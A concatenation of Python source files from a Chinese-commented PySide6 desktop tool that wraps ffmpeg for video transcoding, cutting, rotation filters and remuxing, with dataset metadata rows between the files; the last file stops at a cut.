self.plainTextEdit.setPlainText(self.custom_encoder) def enable_profile(self): if self.checkBox.isChecked(): self.comboBox_5.setEnabled(True) if self.comboBox_5.currentText() == '默认': self.custom_encoder = r'-vcodec libx264 -preset medium -crf 23 -acodec aac -b:a 128k ' self.plainTextEdit.setPlainText(self.custom_encoder) else: self.comboBox_5.setEnabled(False) def change_profile(self): if self.checkBox.isChecked() and self.comboBox_5.currentTextChanged(): if self.comboBox_5.currentText() == '默认': self.custom_encoder = r'-vcodec libx264 -preset medium -crf 23 -acodec aac -b:a 128k ' self.plainTextEdit.setPlainText(self.custom_encoder) # Encoding def encoding(self): # 是否传入文件 # 如果输入文件和输出文件都存在,则执行转码任务 if not self.lineEdit1.text() == '' and not self.lineEdit2.text() == '': # 检查输入文件是否合法 if os.path.isfile(self.lineEdit1.text()): if self.lineEdit3.text() == '' and self.lineEdit4.text() == '': # 无音频无字幕 if self.timeEdit.text() == '0:00:00:000' and self.timeEdit_2.text() == '0:00:00:000': self.console.appendPlainText("执行简单转码任务,请稍等...") # 简单转码任务 self.worker = Worker('video_encode', ffpath.ffmpeg_path, ffpath.ffprobe_path, self.lineEdit1.text(), self.lineEdit2.text(), self.plainTextEdit.toPlainText()) # 开启子进程 self.thread = WorkerThread(self.worker) self.thread.started.connect(lambda: self.console.appendPlainText("开始视频转码")) # 线程开始时显示提示信息 self.thread.finished.connect(lambda: self.console.appendPlainText("完成视频转码")) # 线程结束时显示提示信息 self.thread.finished.connect(self.worker.deleteLater) # 线程结束时删除worker对象 self.thread.finished.connect(self.thread.deleteLater) # 线程结束时删除线程对象 self.thread.start() # 开始线程 elif not self.timeEdit.text() == '0:00:00:000' or not self.timeEdit_2.text() == '0:00:00:000': self.console.appendPlainText("执行切割任务,请稍等...") # 切割任务 self.worker = Worker('extract_video', ffpath.ffmpeg_path, ffpath.ffprobe_path, self.lineEdit1.text(), self.lineEdit2.text(), self.timeEdit.text(), self.timeEdit_2.text(), self.plainTextEdit.toPlainText()) # 开启子进程 self.thread = WorkerThread(self.worker) self.thread.started.connect(lambda: self.console.appendPlainText("开始视频转码")) # 线程开始时显示提示信息 self.thread.finished.connect(lambda: self.console.appendPlainText("完成视频转码")) # 线程结束时显示提示信息 self.thread.finished.connect(self.worker.deleteLater) # 线程结束时删除worker对象 self.thread.finished.connect(self.thread.deleteLater) # 线程结束时删除线程对象 self.thread.start() # 开始线程 elif not self.lineEdit3.text() == '' or not self.lineEdit4.text() == '': # 有音频或字幕 if self.timeEdit.text() == '0:00:00:000' and self.timeEdit_2.text() == '0:00:00:000': self.console.appendPlainText("执行音视频合成任务,请稍等...") # 音视频合成任务 if self.lineEdit3.text() != '': audio_input_file_path = self.lineEdit3.text() audio = f'-i "{audio_input_file_path}"' else: audio = '' if self.lineEdit4.text() != '': subtitle_input_file_path = self.lineEdit4.text().replace(':', r'\:') # 注意转义 if os.path.splitext(subtitle_input_file_path)[1] == '.srt': subtitle_format = 'subtitles' elif os.path.splitext(subtitle_input_file_path)[1] == '.ass': subtitle_format = 'ass' else: logger.error("字幕格式错误,请检查!") subtitle = f'-vf "{subtitle_format}=\'{subtitle_input_file_path}\'"' # 注意转义 else: subtitle = '' self.worker = Worker('avsmix_encode', ffpath.ffmpeg_path, ffpath.ffprobe_path,self.lineEdit1.text(), self.lineEdit2.text(), audio, subtitle, self.plainTextEdit.toPlainText()) # 开启子进程 self.thread = WorkerThread(self.worker) self.thread.started.connect(lambda: self.console.appendPlainText("开始音视频合成")) # 线程开始时显示提示信息 self.thread.finished.connect(lambda: self.console.appendPlainText("完成音视频合成")) # 线程结束时显示提示信息 self.thread.finished.connect(self.worker.deleteLater) # 线程结束时删除worker对象 self.thread.finished.connect(self.thread.deleteLater) # 线程结束时删除线程对象 self.thread.start() # 开始线程 else: MessageBox("警告", "切割功能暂不支持音视频合成,分别执行!", parent=self).exec() self.timeEdit.setText('0:00:00:000') self.timeEdit_2.setText('0:00:00:000') else: # QMessageBox.warning(self, "警告", "输入文件不存在!", QMessageBox.Yes) w = MessageBox("提示", "输入文件不存在!", parent=self) if w.exec(): logger.info('确认,关闭提示窗口') else: logger.info('取消,关闭提示窗口') # 如果输入输出不存在,音频存在,执行音频转码 elif self.lineEdit1.text() == '' and self.lineEdit2.text() == '' and not self.lineEdit3.text() == '': self.custom_encoder = f'{self.acodec} {self.apreset} ' # 结尾要有空格 # QMessageBox.information(self, "提示", f"进行音频转码,请选择输出文件,转码格式为{self.acodec} {self.apreset}", QMessageBox.Yes) w = MessageBox("提示", f"进行音频转码,请选择输出文件,转码格式为{self.acodec} {self.apreset}", parent=self) if w.exec(): audio_output_file_path, _ = QFileDialog.getSaveFileName(self, "选择输出文件", self.lineEdit3.text(), "音频文件 (*.aac *.flac *.mp3 *.m4a *.wav *.wma *.ogg *.opus *.alac)") # 开始音频转码 self.worker = Worker('audio_encode', ffpath.ffmpeg_path, ffpath.ffprobe_path, self.lineEdit3.text(), audio_output_file_path, self.custom_encoder) # 开启子进程 self.thread = WorkerThread(self.worker) self.thread.started.connect(lambda: self.console.appendPlainText("开始音频转码")) # 线程开始时显示提示信息 self.thread.finished.connect(lambda: self.console.appendPlainText("完成音频转码")) # 线程结束时显示提示信息 self.thread.finished.connect(self.worker.deleteLater) # 线程结束时删除worker对象 self.thread.finished.connect(self.thread.deleteLater) # 线程结束时删除线程对象 self.thread.start() # 开始线程 else: logger.info('取消,关闭提示窗口') ######## 显示进度条 ######## # 打开输出文件夹 # 判断是否成功 # os.startfile(os.path.dirname(audio_output_file_path)) # 如果输出都不存在,则提示选择文件 elif not self.lineEdit1.text() == '' and self.lineEdit2.text() == '': # QMessageBox.warning(self, "警告", "请选择输出文件!", QMessageBox.Yes) w = MessageBox("警告", "请选择输出文件!", parent=self) if w.exec(): logger.info('确认,关闭警告窗口') else: logger.info('取消,关闭警告窗口')
22,456
Python
.py
351
45.908832
237
0.615477
wish2333/VideoExtractAndConcat
8
0
0
LGPL-2.1
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,458
ffmpegApi_filter.py
wish2333_VideoExtractAndConcat/modules/ffmpegApi_filter.py
# ffmpegApi.py # 实现了FFmpeg的命令行接口,可以对视频进行各种操作,如截取、合并、转码、截图等。 import subprocess import os from modules.logger_config import logger import time import threading from modules.config import ffpath import configparser class FFmpegFilter: # 初始化函数,用于初始化实例的ffmpeg_path属性 def __init__( self, ffmpeg_path=ffpath.ffmpeg_path, ffprobe_path=ffpath.ffprobe_path, interrupt_flag=False, # 中断标志 callback=None, # 回调函数 ): self.ffmpeg_path = ffmpeg_path self.ffprobe_path = ffprobe_path self.interrupt_flag = interrupt_flag self.callback = callback def update_interrupt_flag(self, flag=True): self.interrupt_flag = flag def check_interrupt_flag(self): while not self.interrupt_flag: # logger.info("ffmpegapi守卫线程运行中") time.sleep(1) logger.debug("ffmpegapi检测到中断请求") self.interrupt_run() def interrupt_run(self): if self.interrupt_flag: # 如果收到中断信号,则终止FFmpeg进程 logger.debug("尝试终止FFmpeg进程") self.p.terminate() self.p.wait(timeout=5) if self.p.poll() is None: self.p.kill() if callable(self.callback): self.callback() self.interrupt_flag = False logger.debug("FFmpeg进程强制终止") logger.debug("ffmpegapi中断请求已处理") # 定义run方法来执行FFmpeg命令 def run(self, cmd): t = None # 守卫线程预留在try之外 try: cmd = [self.ffmpeg_path] + cmd cmd_str = ' '.join(cmd) logger.info(f"尝试执行:{cmd_str}") # 创建线程运行FFmpeg命令 self.p = subprocess.Popen(cmd_str, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, encoding='utf-8', text=True) # 创建线程检测中断信号 t = threading.Thread(target=self.check_interrupt_flag) t.daemon = True t.start() if t.is_alive(): logger.debug('启动守卫线程成功') else: logger.error('启动守卫线程失败') # 实时输出FFmpeg命令的执行信息 while True: line = self.p.stdout.readline() if not line: # 如果没有更多输出,检查进程是否已经结束 if self.p.poll() is not None: break else: continue logger.debug(line.strip()) # 打印输出信息 print(line.strip(), end='\r') # 打印输出信息 # 如果出错,获取错误信息 out, err = self.p.communicate() if self.p.returncode != 0: logger.error(f"命令执行失败,错误信息:{err}") raise Exception(err) except FileNotFoundError as fnf_error: logger.error( f"找不到ffmpeg或ffprobe命令,请检查ffmpeg_path和ffprobe_path是否正确配置。") raise fnf_error except PermissionError as p_error: logger.error( f"ffmpeg或ffprobe命令没有执行权限,请检查ffmpeg_path和ffprobe_path是否正确配置。") raise p_error except Exception as e: logger.error(f"执行FFmpeg命令失败:{e}") raise e finally: logger.info("FFmpeg命令执行完成") if t and t.is_alive(): self.interrupt_flag = True # 设置中断标志 t.join() self.interrupt_flag = False # 重置中断标志 logger.debug("守卫线程退出") # 获取视频时长 def get_duration(self, input_file): cmd1 = [ self.ffprobe_path, '-v', 'error', '-show_entries', 'format=duration', '-of', 'default=noprint_wrappers=1:nokey=1', input_file ] logger.debug("执行:" + ' '.join(cmd1)) result = subprocess.run(cmd1, capture_output=True, text=True) # 检查输出是否为空 stdout = result.stdout.strip() if not stdout: logger.error("ffprobe 输出为空,无法获取视频持续时间") return None # 或者返回一个默认值 try: duration = float(stdout) logger.debug("视频总秒数为:" + str(duration)) return duration except ValueError as e: logger.error("转换视频持续时间为浮点数时出错:", str(e)) raise e # 或者返回一个错误信息 # 横竖转换Filter def rotate_filter(self, image_, scale_x='1080', scale_y='1920', input=None): if image_[0] == 'H2V-I': # ffmpeg 命令:横屏转竖屏,视频宽边保持,图片缩放,视频下方叠加图片,空白区域显示为透明 if input != 'flag': duration = self.get_duration(input) else: duration = '@duration' filter = f'-filter_complex "[1:v]scale={scale_x}:{scale_y},setsar=1,loop=-1:size={duration}[bg];[0:v]scale={scale_x}:-2,setsar=1[v];[bg][v]overlay=(W-w)/2:(H-h)/2:shortest=1[vout]" -map "[vout]" -map 0:a' filter = f'-filter_complex "[1:v]scale={scale_x}:{scale_y},setsar=1,loop=-1:size={duration}[bg];[0:v]scale={scale_x}:-2,setsar=1[v];[bg][v]overlay=(W-w)/2:(H-h)/2:shortest=1[vout]" -map "[vout]" -map 0:a' elif image_[0] == 'H2V-T': # ffmpeg 命令:横屏转竖屏,背景叠加模糊视频 filter = f'-filter_complex "[0:v]split=2[v_main][v_bg];[v_main]scale=w={scale_x}:h=-1,setsar=1,pad={scale_x}:{scale_y}:(ow-iw)/2:(oh-ih)/2:color=black@0[v_scaled];[v_bg]crop=ih*{float(scale_x)/float(scale_y)}:ih,boxblur=10:5,scale={scale_x}:{scale_y}[bg_blurred];[bg_blurred][v_scaled]overlay=(W-w)/2:(H-h)/2:shortest=1[vout]" -map "[vout]" -map 0:a' elif image_[0] == 'H2V-B': # ffmpeg 命令:横屏转竖屏,不叠加图片,空白区域显示为黑色 filter = f'-filter_complex "[0:v]scale=w={scale_x}:h=-1,setsar=1,pad={scale_x}:{scale_y}:(ow-iw)/2:(oh-ih)/2:black[vout]" -map "[vout]" -map 0:a' elif image_[0] == 'V2H-I': # ffmpeg 命令:竖屏转横屏,视频宽边保持,图片缩放,视频下方叠加图片,空白区域显示为透明 if input != 'flag': duration = self.get_duration(input) else: duration = '@duration' filter = f'-filter_complex "[1:v]scale={scale_x}:{scale_y},setsar=1,loop=-1:size={duration}[bg];[0:v]scale=-2:{scale_y},setsar=1[v];[bg][v]overlay=(W-w)/2:(H-h)/2:shortest=1[vout]" -map "[vout]" -map 0:a' elif image_[0] == 'V2H-T': # ffmpeg 命令:竖屏转横屏,背景叠加模糊视频 filter = f'-filter_complex "[0:v]split=2[v_main][v_bg];[v_main]scale=w=-1:h={scale_y},setsar=1,pad={scale_x}:{scale_y}:(ow-iw)/2:(oh-ih)/2:color=black@0[v_scaled];[v_bg]crop=iw:iw*{float(scale_y)/float(scale_x)},boxblur=10:5,scale={scale_x}:{scale_y}[bg_blurred];[bg_blurred][v_scaled]overlay=(W-w)/2:(H-h)/2:shortest=1[vout]" -map "[vout]" -map 0:a' elif image_[0] == 'V2H-B': # ffmpeg 命令:竖屏转横屏,不叠加图片,空白区域显示为黑色 filter = f'-filter_complex "[0:v]scale=-1:h={scale_y},setsar=1,pad={scale_x}:{scale_y}:(ow-iw)/2:(oh-ih)/2:black[vout]" -map "[vout]" -map 0:a' else: return return filter # 横屏转竖屏 def rotate_video( self, input, output, image_, audio_filter=False, scale_x='1080', scale_y='1920', encoder='-c:v libx264 -preset medium -crf 23 -c:a aac -b:a 256k -ar 44100 -ac 2'): # 构建cmd cmd = ['-hide_banner', '-y', '-i', f'"{input}"'] # 旋转处理 rotate_filter = self.rotate_filter(image_, scale_x, scale_y) if rotate_filter is not None: if image_[0] == 'V2H-I' or image_[0] == 'H2V-I': cmd += ['-i', f'{image_[1]}'] cmd += [rotate_filter] # 音频处理 if audio_filter: cmd += ['-af', 'loudnorm=i=-16.0:lra=5.0:tp=-0.3'] # 编码处理 cmd += [encoder, '-max_muxing_queue_size 1024', f'"{output}"'] # self.run(cmd) return cmd # 测试用例 # f = FFmpeg(r'Q:\Git\FFmpeg-python\FFmpeg\bin\ffmpeg.exe', r'Q:\Git\FFmpeg-python\FFmpeg\bin\ffprobe.exe') # input = r'Q:\Git\FFmpeg-python\测试视频\test-input\【1080P_4月】神之塔 OP&ED TV size - 1.OP(Av412589437,P1).mp4' # output = r'Q:\Git\FFmpeg-python\测试视频\output\【1080P_4月】神之塔 OP&ED TV size - 1.OP(Av412589437,P1).mp4' # image_ = ['T', r'F:\资源-图片\收藏\2021-12\45529923_p0.jpg'] # encoder = '-c:v h264_nvenc -preset medium -crf 23 -c:a aac -b:a 256k' # p = f.rotate_video(input, output, image_) # p_str = ' '.join(p) # print(p) # print(p_str)
9,645
Python
.py
186
33.360215
366
0.538536
wish2333/VideoExtractAndConcat
8
0
0
LGPL-2.1
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,459
Ui_aboutInterface.py
wish2333_VideoExtractAndConcat/modules/Ui_aboutInterface.py
# -*- coding: utf-8 -*- ################################################################################ ## Form generated from reading UI file 'aboutInterface.ui' ## ## Created by: Qt User Interface Compiler version 6.7.0 ## ## WARNING! All changes made in this file will be lost when recompiling UI file! ################################################################################ from PySide6.QtCore import (QCoreApplication, QDate, QDateTime, QLocale, QMetaObject, QObject, QPoint, QRect, QSize, QTime, QUrl, Qt) from PySide6.QtGui import (QBrush, QColor, QConicalGradient, QCursor, QFont, QFontDatabase, QGradient, QIcon, QImage, QKeySequence, QLinearGradient, QPainter, QPalette, QPixmap, QRadialGradient, QTransform) from PySide6.QtWidgets import (QApplication, QFrame, QGridLayout, QHBoxLayout, QLabel, QLayout, QPushButton, QSizePolicy, QSpacerItem, QVBoxLayout, QWidget) from qfluentwidgets import (PushButton, ScrollArea) class Ui_AboutInterface(object): def setupUi(self, AboutInterface): if not AboutInterface.objectName(): AboutInterface.setObjectName(u"AboutInterface") AboutInterface.resize(1093, 765) AboutInterface.setMinimumSize(QSize(780, 0)) self.verticalLayout = QVBoxLayout(AboutInterface) self.verticalLayout.setObjectName(u"verticalLayout") self.AboutIFscrollArea = ScrollArea(AboutInterface) self.AboutIFscrollArea.setObjectName(u"AboutIFscrollArea") self.AboutIFscrollArea.setMinimumSize(QSize(760, 0)) self.AboutIFscrollArea.setFrameShape(QFrame.Shape.NoFrame) self.AboutIFscrollArea.setFrameShadow(QFrame.Shadow.Sunken) self.AboutIFscrollArea.setWidgetResizable(True) self.AboutIFfacescrollAreaWidgetContents = QWidget() self.AboutIFfacescrollAreaWidgetContents.setObjectName(u"AboutIFfacescrollAreaWidgetContents") self.AboutIFfacescrollAreaWidgetContents.setGeometry(QRect(0, 0, 1075, 747)) self.verticalLayout_3 = QVBoxLayout(self.AboutIFfacescrollAreaWidgetContents) self.verticalLayout_3.setObjectName(u"verticalLayout_3") self.AboutIFbox01 = QHBoxLayout() self.AboutIFbox01.setSpacing(20) self.AboutIFbox01.setObjectName(u"AboutIFbox01") self.AboutIFbox01.setSizeConstraint(QLayout.SizeConstraint.SetDefaultConstraint) self.AboutIFverticalLayout_4 = QVBoxLayout() self.AboutIFverticalLayout_4.setObjectName(u"AboutIFverticalLayout_4") self.AboutIFverticalLayout_4.setContentsMargins(-1, -1, 0, -1) self.AboutIFTitle1 = QLabel(self.AboutIFfacescrollAreaWidgetContents) self.AboutIFTitle1.setObjectName(u"AboutIFTitle1") sizePolicy = QSizePolicy(QSizePolicy.Policy.Maximum, QSizePolicy.Policy.Maximum) sizePolicy.setHorizontalStretch(0) sizePolicy.setVerticalStretch(0) sizePolicy.setHeightForWidth(self.AboutIFTitle1.sizePolicy().hasHeightForWidth()) self.AboutIFTitle1.setSizePolicy(sizePolicy) self.AboutIFTitle1.setMaximumSize(QSize(100, 64)) font = QFont() font.setPointSize(28) font.setBold(True) font.setKerning(True) self.AboutIFTitle1.setFont(font) self.AboutIFverticalLayout_4.addWidget(self.AboutIFTitle1) self.AboutIFTitle2 = QLabel(self.AboutIFfacescrollAreaWidgetContents) self.AboutIFTitle2.setObjectName(u"AboutIFTitle2") sizePolicy1 = QSizePolicy(QSizePolicy.Policy.Preferred, QSizePolicy.Policy.Maximum) sizePolicy1.setHorizontalStretch(0) sizePolicy1.setVerticalStretch(0) sizePolicy1.setHeightForWidth(self.AboutIFTitle2.sizePolicy().hasHeightForWidth()) self.AboutIFTitle2.setSizePolicy(sizePolicy1) self.AboutIFTitle2.setMaximumSize(QSize(300, 45)) font1 = QFont() font1.setPointSize(18) font1.setBold(True) font1.setKerning(True) self.AboutIFTitle2.setFont(font1) self.AboutIFverticalLayout_4.addWidget(self.AboutIFTitle2) self.AboutIFbox01.addLayout(self.AboutIFverticalLayout_4) self.Aboutlabel = QLabel(self.AboutIFfacescrollAreaWidgetContents) self.Aboutlabel.setObjectName(u"Aboutlabel") self.Aboutlabel.setMaximumSize(QSize(16777215, 80)) self.AboutIFbox01.addWidget(self.Aboutlabel) self.AboutIFhorizontalSpacer = QSpacerItem(20, 20, QSizePolicy.Policy.Expanding, QSizePolicy.Policy.Minimum) self.AboutIFbox01.addItem(self.AboutIFhorizontalSpacer) self.verticalLayout_3.addLayout(self.AboutIFbox01) self.AboutIFbox02 = QFrame(self.AboutIFfacescrollAreaWidgetContents) self.AboutIFbox02.setObjectName(u"AboutIFbox02") self.AboutIFbox02.setEnabled(True) sizePolicy2 = QSizePolicy(QSizePolicy.Policy.Preferred, QSizePolicy.Policy.Minimum) sizePolicy2.setHorizontalStretch(0) sizePolicy2.setVerticalStretch(0) sizePolicy2.setHeightForWidth(self.AboutIFbox02.sizePolicy().hasHeightForWidth()) self.AboutIFbox02.setSizePolicy(sizePolicy2) self.AboutIFbox02.setMinimumSize(QSize(480, 145)) self.AboutIFbox02.setMaximumSize(QSize(16777215, 480)) self.AboutIFbox02.setFrameShape(QFrame.Shape.StyledPanel) self.AboutIFbox02.setFrameShadow(QFrame.Shadow.Raised) self.gridLayout = QGridLayout(self.AboutIFbox02) self.gridLayout.setObjectName(u"gridLayout") self.AboutIFlabel = QLabel(self.AboutIFbox02) self.AboutIFlabel.setObjectName(u"AboutIFlabel") sizePolicy2.setHeightForWidth(self.AboutIFlabel.sizePolicy().hasHeightForWidth()) self.AboutIFlabel.setSizePolicy(sizePolicy2) self.AboutIFlabel.setMinimumSize(QSize(720, 120)) font2 = QFont() font2.setPointSize(12) self.AboutIFlabel.setFont(font2) self.AboutIFlabel.setFrameShadow(QFrame.Shadow.Plain) self.AboutIFlabel.setLineWidth(1) self.AboutIFlabel.setTextFormat(Qt.TextFormat.AutoText) self.AboutIFlabel.setScaledContents(False) self.AboutIFlabel.setAlignment(Qt.AlignmentFlag.AlignJustify|Qt.AlignmentFlag.AlignTop) self.AboutIFlabel.setWordWrap(True) self.AboutIFlabel.setMargin(24) self.AboutIFlabel.setIndent(-1) self.AboutIFlabel.setOpenExternalLinks(False) self.gridLayout.addWidget(self.AboutIFlabel, 1, 0, 1, 3) self.AboutIFinputclear = PushButton(self.AboutIFbox02) self.AboutIFinputclear.setObjectName(u"AboutIFinputclear") sizePolicy3 = QSizePolicy(QSizePolicy.Policy.Minimum, QSizePolicy.Policy.Minimum) sizePolicy3.setHorizontalStretch(0) sizePolicy3.setVerticalStretch(0) sizePolicy3.setHeightForWidth(self.AboutIFinputclear.sizePolicy().hasHeightForWidth()) self.AboutIFinputclear.setSizePolicy(sizePolicy3) self.AboutIFinputclear.setMinimumSize(QSize(0, 120)) font3 = QFont() font3.setPointSize(12) font3.setBold(True) self.AboutIFinputclear.setFont(font3) self.gridLayout.addWidget(self.AboutIFinputclear, 0, 1, 1, 1) self.AboutIFinputfile = PushButton(self.AboutIFbox02) self.AboutIFinputfile.setObjectName(u"AboutIFinputfile") sizePolicy3.setHeightForWidth(self.AboutIFinputfile.sizePolicy().hasHeightForWidth()) self.AboutIFinputfile.setSizePolicy(sizePolicy3) self.AboutIFinputfile.setMinimumSize(QSize(0, 120)) self.AboutIFinputfile.setFont(font3) self.gridLayout.addWidget(self.AboutIFinputfile, 0, 0, 1, 1) self.AboutIFoutputfolder = QPushButton(self.AboutIFbox02) self.AboutIFoutputfolder.setObjectName(u"AboutIFoutputfolder") sizePolicy3.setHeightForWidth(self.AboutIFoutputfolder.sizePolicy().hasHeightForWidth()) self.AboutIFoutputfolder.setSizePolicy(sizePolicy3) self.AboutIFoutputfolder.setMinimumSize(QSize(0, 120)) self.AboutIFoutputfolder.setFont(font3) self.gridLayout.addWidget(self.AboutIFoutputfolder, 0, 2, 1, 1) self.verticalLayout_3.addWidget(self.AboutIFbox02) self.AboutIFlabel_2 = QLabel(self.AboutIFfacescrollAreaWidgetContents) self.AboutIFlabel_2.setObjectName(u"AboutIFlabel_2") font4 = QFont() font4.setPointSize(18) font4.setBold(True) self.AboutIFlabel_2.setFont(font4) self.verticalLayout_3.addWidget(self.AboutIFlabel_2) self.AboutIFbox04 = QFrame(self.AboutIFfacescrollAreaWidgetContents) self.AboutIFbox04.setObjectName(u"AboutIFbox04") self.AboutIFbox04.setFrameShape(QFrame.Shape.StyledPanel) self.AboutIFbox04.setFrameShadow(QFrame.Shadow.Raised) self.horizontalLayout = QHBoxLayout(self.AboutIFbox04) self.horizontalLayout.setObjectName(u"horizontalLayout") self.AboutIFrefer1 = QPushButton(self.AboutIFbox04) self.AboutIFrefer1.setObjectName(u"AboutIFrefer1") sizePolicy3.setHeightForWidth(self.AboutIFrefer1.sizePolicy().hasHeightForWidth()) self.AboutIFrefer1.setSizePolicy(sizePolicy3) self.AboutIFrefer1.setMinimumSize(QSize(0, 60)) self.AboutIFrefer1.setFont(font3) self.horizontalLayout.addWidget(self.AboutIFrefer1) self.AboutIFrefer3 = QPushButton(self.AboutIFbox04) self.AboutIFrefer3.setObjectName(u"AboutIFrefer3") sizePolicy3.setHeightForWidth(self.AboutIFrefer3.sizePolicy().hasHeightForWidth()) self.AboutIFrefer3.setSizePolicy(sizePolicy3) self.AboutIFrefer3.setMinimumSize(QSize(0, 60)) self.AboutIFrefer3.setFont(font3) self.horizontalLayout.addWidget(self.AboutIFrefer3) self.AboutIFrefer2 = QPushButton(self.AboutIFbox04) self.AboutIFrefer2.setObjectName(u"AboutIFrefer2") sizePolicy3.setHeightForWidth(self.AboutIFrefer2.sizePolicy().hasHeightForWidth()) self.AboutIFrefer2.setSizePolicy(sizePolicy3) self.AboutIFrefer2.setMinimumSize(QSize(0, 60)) self.AboutIFrefer2.setFont(font3) self.horizontalLayout.addWidget(self.AboutIFrefer2) self.verticalLayout_3.addWidget(self.AboutIFbox04) self.AboutIFlabel_3 = QLabel(self.AboutIFfacescrollAreaWidgetContents) self.AboutIFlabel_3.setObjectName(u"AboutIFlabel_3") self.AboutIFlabel_3.setFont(font4) self.verticalLayout_3.addWidget(self.AboutIFlabel_3) self.label = QLabel(self.AboutIFfacescrollAreaWidgetContents) self.label.setObjectName(u"label") self.label.setTextFormat(Qt.TextFormat.MarkdownText) self.label.setMargin(12) self.verticalLayout_3.addWidget(self.label) self.AboutIFscrollArea.setWidget(self.AboutIFfacescrollAreaWidgetContents) self.verticalLayout.addWidget(self.AboutIFscrollArea) self.retranslateUi(AboutInterface) QMetaObject.connectSlotsByName(AboutInterface) # setupUi def retranslateUi(self, AboutInterface): AboutInterface.setWindowTitle(QCoreApplication.translate("AboutInterface", u"Form", None)) self.AboutIFTitle1.setText(QCoreApplication.translate("AboutInterface", u"\u5173\u4e8e", None)) self.AboutIFTitle2.setText(QCoreApplication.translate("AboutInterface", u"\u4f5c\u8005\uff1awish_2333", None)) self.Aboutlabel.setText(QCoreApplication.translate("AboutInterface", u"\u4e00\u4e2a\u89c6\u9891\u6279\u5904\u7406\u7684\u5de5\u5177\u7bb1", None)) self.AboutIFlabel.setText(QCoreApplication.translate("AboutInterface", u"VideoExtractAndConcat\n" "\n" "\u672c\u9879\u76ee\u65e8\u5728\u5f00\u53d1\u4e00\u4e2a\u7528\u6237\u53cb\u597d\u7684\u56fe\u5f62\u754c\u9762\u5e94\u7528\u7a0b\u5e8f\uff0c\u7528\u4e8e\u89c6\u9891\u7247\u5934\u548c\u7247\u5c3e\u7684\u5feb\u901f\u5207\u5272\u4e0e\u5408\u5e76\u529f\u80fd\u3002\u901a\u8fc7\u96c6\u6210QtDesigner\u8bbe\u8ba1\u7684\u754c\u9762\u4e0ePython\u7f16\u7a0b\u8bed\u8a00\uff0c\u7ed3\u5408\u5f3a\u5927\u7684ffmpeg\u5de5\u5177\uff0c\u7528\u6237\u80fd\u591f\u8f7b\u677e\u6307\u5b9a\u89c6\u9891\u6587\u4ef6\u3001\u8bbe\u7f6e\u5207\u5272\u65f6\u95f4\u70b9\uff0c\u5b8c\u6210\u89c6\u9891\u5904\u7406\u4efb\u52a1\u3002\u9879\u76ee\u6700\u7ec8\u76ee\u6807\u662f\u63d0\u9ad8\u89c6\u9891\u7f16\u8f91\u6548\u7387\uff0c\u5c24\u5176\u9002\u5408\u9700\u8981\u6279\u91cf\u5904\u7406\u89c6\u9891\u7684\u7528\u6237\u3002", None)) self.AboutIFinputclear.setText(QCoreApplication.translate("AboutInterface", u"Bilibili\uff1awish_2333", None)) self.AboutIFinputfile.setText(QCoreApplication.translate("AboutInterface", u"Github\uff1awish2333", None)) self.AboutIFoutputfolder.setText(QCoreApplication.translate("AboutInterface", u"\u4e2a\u4eba\u535a\u5ba2\uff1aWish's Blog", None)) self.AboutIFlabel_2.setText(QCoreApplication.translate("AboutInterface", u"\u53c2\u8003\u9879\u76ee", None)) self.AboutIFrefer1.setText(QCoreApplication.translate("AboutInterface", u"API: FFmpeg", None)) self.AboutIFrefer3.setText(QCoreApplication.translate("AboutInterface", u"API\uff1aauto-editor", None)) self.AboutIFrefer2.setText(QCoreApplication.translate("AboutInterface", u"UI: Fluent-Widget", None)) self.AboutIFlabel_3.setText(QCoreApplication.translate("AboutInterface", u"\u66f4\u65b0\u65e5\u5fd7", None)) self.label.setText(QCoreApplication.translate("AboutInterface", u"## Update20240607\n" "**version-1.0**\n" "- \u65b0\u589e\u81ea\u52a8\u526a\u8f91\u754c\u9762\uff08\u652f\u6301\u526a\u5207\u6c14\u53e3\uff0c\u751f\u6210\u89c6\u9891\u3001\u97f3\u9891\u3001\u5207\u7247\u3001\u5de5\u7a0b\u6587\u4ef6\uff09", None)) # retranslateUi
13,668
Python
.py
210
56.704762
800
0.752684
wish2333/VideoExtractAndConcat
8
0
0
LGPL-2.1
9/5/2024, 10:48:43 PM (Europe/Amsterdam)
2,289,460
remuxInterface.py
wish2333_VideoExtractAndConcat/modules/remuxInterface.py
import os from PySide6.QtCore import Qt, QThread, Signal, QObject, QTime from PySide6.QtGui import QPixmap, QPainter, QColor from PySide6.QtWidgets import QWidget, QFileDialog, QMessageBox, QListWidgetItem from qfluentwidgets import MessageBox from modules.config import ffpath from modules.ffmpegApi import FFmpeg from modules.Ui_remuxInterface import Ui_remuxInterface from modules.logger_config import logger # 继承自QObject的子类,用于执行后台任务的子类 class Worker(QObject): started = Signal() # 任务开始时发出的信号 finished = Signal() # 任务完成时发出的信号 interrupted = Signal() # 任务被中断时发出的信号 callback = Signal() # 任务执行过程中输出的信号 def __init__(self, task_type, ffmpeg_path, ffprobe_path, *task_args, callback=None): super().__init__() self.task_type = task_type self.ffmpeg_path = ffmpeg_path self.ffprobe_path = ffprobe_path self.task_args = task_args logger.info(f"Simple {task_type} task started") self._started_flag = False # 任务是否开始的标志 self._interrupted_flag = False # 任务是否被中断的标志 self.callback = callback # 任务执行过程中输出的回调函数 self.is_interrupted = False # 任务被中断时的回调函数 def interrupt(self): self._interrupted_flag = True # 设置任务被中断的标志 self.ffmpeg_instance.update_interrupt_flag(self._interrupted_flag) # 更新全局中断标志 logger.info('中止信号已发出') def interrupted_callback(self): logger.info('中止信号回调,worker任务被中断') self.is_interrupted = True # 设置任务被中断的标志 if callable(self.callback): self.callback() self.interrupted.emit() # 发出中断信号 def run_ffmpeg_task(self): self._started_flag = True # 任务开始的标志 self.started.emit() # 任务开始,发出信号 if self.task_type == 'remux_video': self.remux_video(*self.task_args) elif self.task_type == 'norEx_video': self.norEx_video(*self.task_args) elif self.task_type == 'mulEx_video': self.mulEx_video(*self.task_args) else: logger.error(f"Unknown task type: {self.task_type}") self.finished.emit() # 任务完成,发出信号 # 在这里可以添加更多任务类型的判断和调用 def remux_video(self, input, output, format, overwrite='-y'): self.ffmpeg_instance = FFmpeg(self.ffmpeg_path, interrupt_flag=self._interrupted_flag, callback=self.interrupted_callback) # 实例化FFmpegApi self.ffmpeg_instance.remux_video(input, output, format, overwrite) def norEx_video(self, input, output, action, overwrite='-y'): self.ffmpeg_instance = FFmpeg(self.ffmpeg_path, interrupt_flag=self._interrupted_flag, callback=self.interrupted_callback) # 实例化FFmpegApi self.ffmpeg_instance.norEx_video(input, output, action, 